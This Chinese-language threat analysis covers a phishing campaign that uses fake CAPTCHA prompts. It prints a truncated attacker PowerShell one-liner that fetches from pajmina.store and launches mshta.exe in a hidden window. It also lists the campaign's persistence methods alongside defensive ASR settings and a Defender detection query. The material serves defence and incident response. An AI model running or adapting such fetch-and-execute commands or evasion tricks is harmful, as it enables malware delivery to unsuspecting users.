新型钓鱼攻击：伪装CAPTCHA验证的隐蔽式代码注入攻击分析

一、事件背景

        攻击者以"CAPTCHA验证"（验证码校验）为诱饵，诱导用户执行恶意PowerShell指令，通过多阶段隐蔽加载技术实施网络攻击。

二、攻击链技术解析

1. 初始攻击向量

powershell -w 1 -C "$l='https://pajmina.store/...';Invoke-CimMethod ..."

• 窗口隐藏参数：-w 1使PowerShell窗口处于隐藏状态
• 字符串混淆：('ms' + 'hta' + '.exe')规避基础字符串检测
• CIM/WMI调用：使用Invoke-CimMethod替代传统Start-Process，绕过部分行为监控

2. 载荷投递阶段

3. 持久化机制

攻击成功后会建立以下持久化通道：

1. 注册表自启动项：HKCU\Software\Microsoft\Windows\CurrentVersion\Run
2. 计划任务创建：每小时检测载荷有效性
3. 备用C2服务器轮询：包含3个备用域名解析

三、攻击危害评估

1. 直接威胁

• 远程代码执行（RCE）：可部署Cobalt Strike等攻击框架
• 凭据窃取：Hook浏览器内存读取Cookie/密码
• 横向移动：利用WMI进行内网渗透

四、防御方案建议

1. 预防措施

# 启用攻击面缩减规则（ASR）
Set-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5 -AttackSurfaceReductionRules_Actions Enabled

• 应用控制策略：限制PowerShell执行未签名脚本
• 网络分段：对WMI流量实施TCP 135端口监控
• 邮件网关：配置MIME类型过滤规则阻断.m4a/.hta

2. 检测方案

// Microsoft Defender高级查询
DeviceProcessEvents
| where FileName in~ ("mshta.exe", "powershell.exe")
| where ProcessCommandLine has_any (".m4a", "Invoke-CimMethod", "-WindowStyle Hidden")

3. 应急响应流程

1. 内存取证：使用Volatility提取恶意进程
2. 网络取证：分析DNS查询记录定位C2
3. 磁盘取证：检索$MFT时间线追踪攻击路径

五、案例还原与启示

本次事件中攻击者使用了三阶段混淆技术：

1. 社会工程层：伪造CAPTCHA验证UID提升可信度
2. 执行层：分离式命令拼接绕过基础HIDS检测
3. 载荷层：HTA文件嵌套JavaScript加载Shellcode

该案例验证了MITRE ATT&CK框架中的：

• T1059.001（命令行接口）
• T1218.005（Mshta滥用）
• T1047（WMI利用）

六、建议

• 验证所有"系统验证"请求的真实性
• 警惕非常规域名（如.store/.top等新gTLD）
• 禁用Windows默认的自动执行功能